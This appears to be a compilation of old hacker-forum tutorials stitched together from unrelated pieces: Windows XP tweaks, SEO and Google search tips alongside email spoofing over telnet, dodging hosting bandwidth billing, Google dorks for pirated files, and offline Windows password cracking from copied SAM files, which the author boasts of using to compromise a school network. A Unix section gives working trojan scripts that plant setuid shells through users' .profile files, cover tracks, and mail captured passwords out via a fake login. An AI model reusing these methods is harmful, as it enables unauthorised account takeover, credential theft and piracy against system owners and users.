1. Some ISP's block port 25 so it might not work
2. Most likely, you won't be able to see what yer typing

First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email.

Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):

telnet mail.hotmail.com 25

When yer connected type in (except what's in between *'s; you chose what will go in the []):

mail from:[whoever]@[whoever.com]
rcpt to:[whoever]@[whoever.com]
[whatever you want]
[as many]
[lines as wished]

Helo is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it.

NOTE: This applies only to specific hosting companies, due to the specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal with, I noticed that they used a shared IP. (IP shared by two or more websites/domains.) Well, the rates for unlimited bandwidth were around $50+ per month, which I found unreasonable. I didnt require much space, and didnt want to be limited to a mere 3 gig of traffic per month.

Back on track... When setting up the acct, the hosting company needs to know the domain name so that they can direct it accordingly. (example: 'http://www.123.4.567.890/~user1/ , 'http://www.123.4.567.890/~user2/ etc)

At this point you can give a url that doesnt belong to you at all. As long as the nameservers dont change, that should have absolutly no negative effects on you or your site whatsoever.

How it works is this:
The host propogates you a certain amount space on its servers, and monitors the traffic that enters their space through the domain its registered under. Being that the domain isn't connected to the site at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth restrictions can't possibly go over bandwidth restrictions = free unlimited bandwidth

Now the problems with this (besides the ethical ones) is that your host may offer X amount of mail addys with the acct (you@y...) and these will not work, as the name isnt on their DNS. However, some domain companies allow you to set it up regardless. Another problem seems to be strictly cosmetic, but can be highly problematic... Once you attach the domain you want onto the site, each page comes up/w the ip/UN the host propagated to your acct. Its at this point where you have to have a phenominal 10-15 character alphanumerical or better (#, &, etc) pw, or your site will be vulnerable to attack since the attacker already has your UN. This only gives attackers a slight advantage as the amount of time it would take to brute force a 10 character pw @ a rate of 1,000,000 per second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method, obviously you are going to be using the lowest cost hosting plan available, which in turn will offer the least amount of space. Thats
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads? However, if you upload all your programs, graphics and other large files (have a backup of course) to a reliable free host and target them accordingly from your site you have just freed up a signifigant amount of space. The only setback/w this is having to keep an index card or file around/w your pws, as you should never use the same one twice, and want to use complicated ones.

Windows XP Startup and Performance Tweaks

Windows XP is now the predominant consumer OS of both gamers and power users. Sure, many of us still dual-boot with Win9x, because it is faster for many games, but the joy of a true 32-bit operating system with full consumer support is too much for many of us to remain loyal to NT 4.0 or Windows 2000. Now that Windows XP has matured past its infancy and many (but by far not all) of the bugs have been shaken out of it, Ars Technica brings you the first in a series of tweak guides for this illustrious and yet somewhat finicky OS.

This first guide aims to cover two main areas of contention: the boot process (sans the system services, which are an entire guide of their own) and a mishmash of general computing tweaks. The boot tweaks will be comprised of not only system settings, but also several under-utilized applications that can dramatically reduce load time. The general performance tweaks are simply various tweaks that do not quite fit in with the theme of this article, but still have a significant effect on system startup performance (because most any tweaks that one performs should have some kind of effect on the startup time of the system).

Before we begin, several pieces of laundry need to be aired out. To begin with, if you have already tweaked the services on the computer in question, please return them to the default settings. One of the applications I am recommending requires that several systems be enabled that most power users frequently disable (e.g., Task Scheduler). Once you have completed the tweaks mentioned in this guide, feel free to return said services back to your preferred settings, as they only need to be enabled for a short time.



Hello Dos friends
This is a simple but most forgotton command to create
files like config.sys and autoexec.bat files, well heres it...
Even if u dont have a dos boot disk u can work ur way
to some extent.
At c:\ prompt
copy con config.sys
devicehigh=c:\dos\emm386.exe ram
last drive=z
then press CTRL + z
press enter
Config.sys file will be created.
Similarly u can create autoexec.bat
@echo off
lh mouse
lh doskey
Press CTRL + Z

Delete An "undeletable" File

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.

Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as normal

Here's a manual way of doing it. I'll take this off once you put into your first post zain.

1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Google secrets

Posted by Avans | 15.30

method 1

put this string in google search:

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.


method 2

put this string in google search:

?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at


to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook

Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.

The tutorial is all about getting your site listed on top in Search Engines i.e Search Engine Optimization

First thing you need to do is find the keywords you want to optimize for.

There is great tool by Overture (http://inventory.overture.com/d/sea...ory/suggestion/)

But I would suggest using this free tool called GoodKeywords (http://www.goodkeywords.com/products/gkw/)

This one does the same job as Overture does but it also supports other Search Engines (Lycos and Teoma etc..)

For example if you want to optimize for the keyword "tech news", just search for the keyword in any of the tools specified above... It would show you keywords related to that and not of the searches..

Pick the keywords which are related to your site.

For example when you search for "Tech News" you'll see the following results:

Count Search Term
11770 tech news
351 itt news tech
191 high tech news
60 news tech texas
49 computer tech news
42 bio news tech
34 in itt news tech
30 news tech virginia
29 asia news tech
25 hi tech news
25 sci tech news

Now see what other terms are related to your keyword technology news

Do couple of searches like that and note down around 15-20 keywords.
Then, keep the keywords which are searched most on the top.

Now you need Title Tag for the page.

Title tag should include top 3 keywords, like for "tech news" it can be like :

"Latest Tech News, Information Technology News and Other computer raleted news here."

Remember that characters should not be more than 95 and should not have more than 3 "," commas - some search engines might cosider more than 3 commas as spam

Now move on to Meta Tags

You need following Meta Tags in web page

No need to have other meta tags like abstract, re-visit and all, most people dont read it.


This tag is tells content type is html and character set used it iso-8859-1 there are other character sets also but this is the one mosty used..

This one should have all your keywords inside starting from keyword with most counts...

keyword tag for our example would be something like :

Remember to put around 15-20 keywords max not more than that. Dont repeat keywords or dont put keywords like, "tech news", "info tech news", "latest tech news" and so on...

Provide short decription about your site and include all the keywords mentioned in the title tag.

Decription tag should be:

It can be upto 255 characters and avoid using more than 3 "," commas

This is used for search robots..following explanation will help you :

index,follow = index the page as well as follow the links
noindex,follow = dont index the page but follow the links
index,nofollow = index the page but dont follow the links
noindex,nofollow = dont index page, dont follow the links
all = same as index,follow
none = same as noindex,nofollow

Now move on to body part of the page

Include all top 3 keywords here,
I would suggest to break the keyword and use it...

For example

YourSiteName.com one stop for all kind of Latest Tech News and Computer Related information and reviews.................

Include main keywords in tags

and start with

and then move to


tag will be too big but CSS can help you there, define small font size in css for H1,H2,... tags

When done with page copy, then you need to provide title and alt tags for images and links.

Use some keywords in the tags but dont add all the keywords and if not neccessary then dont use keywords in it, basically it should explain what is image all about.

Remember to add Top keyword atleast 4 times in the body and other 2 keywords thrice and twice respectively.

Now move on to Footer Part
Try to include top keywords here and see the effect, use site keywords as links i.e.

Tech News Software News etc..

Now finally, you need to read some more stuff..may be you can all it as bottom lines...

Site Map - This is page where you need to put all the links present in your site, this is will help Search Engines to find the links easily and also provide link for site map in footer, as search engines start scanning the page from bottom.

Robots.txt - This file contains address of directories which should not be scanned by search engines.. more info can be found here : /http://www.robotstxt.org/wc/exclusion.html search engines line google, yahoo ask for robots.txt file.

Valid HTML - Your code should have valid html and doc type, Its kind of diffucult to follow all the standards but you can atleast open and close all the tags properly, you can check your page's html online here : /http://validator.w3.org/ or you can use this free software called HTML Tidy : /http://tidy.sourceforge.net/

All done now, you just need to check your site with this script, its called SEO Doctor : /http://www.instantposition.com/seo_doctor.cfm

It'll show you the report of your site with solution.

Now, correct the errors and start submitting the site :

Start with google : /http://google.com/addurl.html
then yahoo : /http://submit.search.yahoo.com/free/request
then move to altavista,alltheweb and other search engies..

Also submit your site to direcories like /http://dmoz.org , /http://jayde.com etc...
Dmoz is must, as google, yahoo and may more search engines uses same directory

And remember, dont try to SPAM with keywords in these directories, dmoz is handled by Human Editors

Submitted the sites, but still i cant see you site on top?

Wait for sometime may be a month or so but keep an eye on your search term, use http://GoogleAlert.com - this will show whenever google updates for your keywords, it will mail you the new results.

And also check whether your site is listed on google..
use this tool called Google Monitor, it can be downloaded for free from : http://www.cleverstat.com/google-monitor.htm

How to: Install and run Windows CE on your USB Stick

Portable Windows CE is a 'launcher' for the Windows CE device emulator that can run an emulator-based image from a USB keychain.

Download the Windows CE 5.0 Device Emulator.

Change "Mcft" in link to what it is supposed to be icon_wink.gif

Extract the emulator to a folder on your hard drive by running "setup /a". The installer will prompt you to specify a directory to extract to . For example: D:\PortableCE

Download this launcher script:

Copy the following launcher script to the directory you extracted the setup to. You'll need to rename the file from launchce.cmd.txt to launchce.cmd
Once you have that set up, just copy the entire D:\PortableCE folder over to your USB keychain.

To launch the emulator, just plug in your USB keychain, navigate to the PortableCE folder, and run launchce.cmd. You should (hopefully) have the emulator fire up.

First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod CJustify Fullahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:

1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

WindowsXP should now boot REALLY faster.

This is an easy way to get to the folders on your system without having to open a Windows Explorer Window every time you want to access files. I find it very useful to have this feature as it allows me to access my Folders and Drives immediately and saves me a lot of time.

This works in Windows XP:

1. Right Click an empty spot on your Taskbar (Between your Start Button and your System Tray).
2. Click Toolbars.
3. Click New Toolbar.
4. A Small Window will Open that allows you to pick the folder you wish to make a Toolbar. If you want to access your Desktop Without having to minimize all your windows. Just Pick Desktop. If you want to access ONLY your My Documents Folder, Select that. Any folder will work for this.
5. Click OK.
The New Tool bar will appear at the bottom of your screen next to your System Tray.

If you find this to be not useful, Repeat Steps 1 and 2 and then check click the Toolbar you created that has a check mark next to it. And it will disappear.

If you have more then one operating system installed or wish
to remove an operating system from the boot menu, you can use the following information.

1.Click on Start, Control Panel, System, Advanced.
2.Under Startup and Recovery, click Settings.
3.Under Default Operating System, choose one of the following:

"Microsoft Windows XP Professional /fastdetect"
"Microsoft Windows XP Home /fasdetect"
"Microsoft Windows 2000 Professional /fastdetect"

4.Take the checkmark out of the box for "Time to display a list of Operating Systems".
5.Click Apply and Ok, and reboot the system.

*If you wish to edit the boot.ini file manually, click on the button "EDIT"

learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too

3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-Cursor group;
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.

5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.

TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.

There are quite a few services you can disable from starting automatically.
This would be to speed up your boot time and free resources.
They are only suggestions so I suggestion you read the description of each one when you run Services
and that you turn them off one at a time.

Some possibilities are:
Application Management
Fast UserSwitching
Human Interface Devices
Indexing Service
Net Logon
Remote Desktop Help Session Manager
Remote Registry
Routing & Remote Access
SSDP Discovery Service
Universal Plug and Play Device Host
Web Client


Cleaning the Prefetch Directory

WindowsXP has a new feature called Prefetch. This keeps a shortcut to recently used programs.
However it can fill up with old and obsolete programs.

To clean this periodically go to:

Star / Run / Prefetch
Press Ctrl-A to highlight all the shorcuts
Delete them


Not Displaying Logon, Logoff, Startup and Shutdown Status Messages

To turn these off:

Start Regedit
Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciessystem
If it is not already there, create a DWORD value named DisableStatusMessages
Give it a value of 1

Clearing the Page File on Shutdown

Click on the Start button
Go to the Control Panel
Administrative Tools
Local Security Policy
Local Policies
Click on Security Options
Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
Select "Enable"

For regedit users.....
If you want to clear the page file on each shutdown:

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementClearPageFileAtShutdown
Set the value to 1


No GUI Boot

If you don't need to see the XP boot logo,

Click on the BOOT.INI tab
Check the box for /NOGUIBOOT

Speeding the Startup of Some CD Burner Programs

If you use program other than the native WindowsXP CD Burner software,
you might be able to increase the speed that it loads.

Go to Control Panel / Administrative Tools / Services
Double-click on IMAPI CD-Burning COM Service
For the Startup Type, select Disabled
Click on the OK button and then close the Services window
If you dont You should notice


Getting Rid of Unread Email Messages

To remove the Unread Email message by user's login names:

Start Regedit
For a single user: Go to HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionUnreadMail
For all users: Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUnreadMail
Create a DWORD key called MessageExpiryDays
Give it a value of 0


Decreasing Boot Time

Microsoft has made available a program to analyze and decrease the time it takes to boot to WindowsXP
The program is called BootVis

Uncompress the file.
For a starting point, run Trace / Next Boot + Driver Delays
This will reboot your computer and provide a benchmark
After the reboot, BootVis will take a minute or two to show graphs of your system startup.
Note how much time it takes for your system to load (click on the red vertical line)
Then run Trace / Optimize System
Re-Run the Next Boot + Drive Delays
Note how much the time has decreased
Mine went from approximately 33 to 25 seconds.

Increasing Graphics Performance

By default, WindowsXP turns on a lot of shadows, fades, slides etc to menu items.
Most simply slow down their display.

To turn these off selectively:

Right click on the My Computer icon
Select Properties
Click on the Advanced tab
Under Performance, click on the Settings button
To turn them all of, select Adjust for best performance
My preference is to leave them all off except for Show shadows under mouse pointer and Show window contents while dragging


Increasing System Performance

If you have 512 megs or more of memory, you can increase system performance
by having the core system kept in memory.

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementDisablePagingExecutive
Set the value to be 1
Reboot the computer


Increasing File System Caching

To increase the amount of memory Windows will locked for I/O operations:

Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management
Edit the key IoPageLockLimit


Resolving Inability to Add or Remove Programs

If a particular user cannot add or remove programs, there might be a simple registry edit neeed.

Go to HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesUninstall
Change the DWORD NoAddRemovePrograms to 0 disable it

4096 - 32megs of memory or less
8192 - 32+ megs of memory
16384 - 64+ megs of memory
32768 - 128+ megs of memory
65536 - 256+ megs of memory

ok..... here are the full details.....

this works whether its windows 2000 or windows xp or windows xp SP1 or SP2 or windows server 2003....

this works even if syskey encryption is employed...

if it is FAT filesystem...

just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...

if it is NTFS....

u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.

use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 howver, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.

If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windowz pass.

Programs needed: SAMInside (doesn't matter which version or if demo)
LC4 or LC5 (lophtcrack)( must be full version)
NTFSPro (doesn't matter if demo)
any bootdisk maker

Cracked or full version software can be found on any warez site. If u don"t know what that is or where to get the programs, post a message and I'll tell u or give them to u.

P.S: I might not keep track of this forum, because I'm going to create a new topic and post tutorial there. if u want to post, plz post there.

Now, what do I mean for bad directory permissions? Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it. Now, this comes
in handy when wanting to steal someone's access. If you can write to
a user's .profile, you are in business. You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
? w
[new filesize will be shown]
? q

Now, when the user next logs on, the .profile will create .runme which
will set your ID to the user whose .profile you changed. Ideally, you'll
go back in and zap those lines after the suid is created, and you'll create
a suid somewhere else, and delete the one in his dir. The .runme will
not appear in the user's REGULAR directory list, it will only show up
if he does "ls -a" (or ls with a -a combination), because, the '.' makes
a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix. The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *

The BEST thing that could happen is to find a user's directory writeable
by you. Why? well, you could replace all the files in the directory
with your own devious scripts, or C trojans. Even if a file is not
writeable by you, you can still overwrite it by deleteing it. If you
can read various files, such as the user's .profile, you can make a
self deleting trojan as so:

$ cp .profile temp.pro
$ ed .profile
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
mv temp.pro .profile
? w
[another number]
? q
$ chown that_user temp.pro

What happens is that you make a copy of the .profile before you change it.
Then, you change the original. When he runs it, the steps are made, then
the original version is placed over the current, so if the idiot looks in
his .profile, he won't see anything out of the ordinary, except that he
could notice in a long listing that the change date is very recent, but
most users are not paranoid enough to do extensive checks on their files,
except sysadm files (such as passwd).

Now, remember, even though you can write to a dir, you may not be able
to write to a file without deleting it. If you do not have write perms
for that file, you'll have to delete it and write something in its place
(put a file with the same name there). The most important thing to remember
if you have to delete a .profile is to CHANGE the OWNER back after you
construct a new one (hehe) for that user. He could easily notice that his
.profile was changed and he'll know who did it. YES, you can change the
owner to someone else besides yourself and the original owner (as to throw
him off), but this is not wise as keeping access usually relies on the fact
that they don't know you are around.

You can easily change cron files if you can write to them. I'm not going
to go into detail about cronfile formats here, just find the crontab files
and modify them to create a shell somewhere as root every once in a while,
and set the user-id.

III. Trojan Horses on Detached terminals.
Basically this: You can send garbage to a user's screen and
mess him up bad enough to force a logoff, creating a detached
account. Then you can execute a trojan horse off that terminal in
place of login or something, so the next one who calls can hit the
trojan horse. This USUALLY takes the form of a fake login and
write the username/pw entererred to disk.

Now, there are other trojan horses available for you to write. Now,
don't go thinking about a virus, for they don't work unless ROOT runs
them. Anyway, a common trjan would be a shell script to get the
password, and mail it to you. Now, you can replace the code for
the self deleting trojan with one saying something like:
echo "login: \c"
read lgin
echo off (works on some systems)
(if above not available...: stty -noecho)
echo "Password:\c"
read pw
echo on
echo "Login: $lgin - Pword: $pw" | mail you

Now, the best way to use this is to put it in a seperate script file
so it can be deleted as part of the self deleting trojan. A quick
modification, removing the "login: " and leaving the password
may have it look like SU, so you can get the root password. But
make sure the program deletes itself. Here is a sample trojan
login in C:

/* Get the necessary defs.. */
char *name[80];
char *pw[20];
FILE *strm;
printf("login: ");
pw = getpass("Password:");
strm = fopen("/WhereEver/Whateverfile","a");
fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
/* put some kind of error below... or something... */
printf("Bus Error - Core Dumped\n");

The program gets the login, and the password, and appends it to
a file (/wherever/whateverfile), and creates the file if it can,
and if its not there. That is just an example. Network Annoyances
come later.

IV. Odd systems

There may be systems you can log in to with no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..). Don't give up here. Some systems will
let you login as root, but give you a menu which will allow you to add an
account. However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell. You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting. HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100. The "editing" usually only involves changing the password on the account. If an account has a * for a password, the standard passwd program which changes programs, will say no pw exists, and will ask you to enter one. (wallah! You have just freed an account for yourself. Usually bin and sys have a * for a password). If one exists you'll have to enter the old Password (I hope you know it!) for that account. Then, you are in the same boat as before. (BTW -- These wierd systems are usually Xenix/386, Xenix/286, or Altos/286) With word processors, usually you can select the load command, and when the word processor prompts for a file, you can select the passwd file, to look for open accounts, or at least valid ones to hack. An example would be the informix system. You can get a word processor with that such as Samna word, or something, and those Lamers will not protect against shit like that. Why? The Passwd file HAS to be readable by all for the most part, so each program can "stat" you. However, word processors could be made to restrict editing to a directory, or set of directories. Here is an example: $ id uid=100(sirhack) gid=100(users) $ sword (word processor comes up) (select LOAD A FILE) : /etc/passwd

(you see: )
sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

You can usually tell when you'll get a menu. Sometimes on UNIX
SYSTEM V, when it says TERM = (termtype), and is waiting for
you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
Not much to say about this. all it is, is when every password field
in the password file has an "x" or just a single character. What
that does is screw you, becuase you cannot read the shadowed password
file, only root can, and it contains all the passwords, so you will
not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
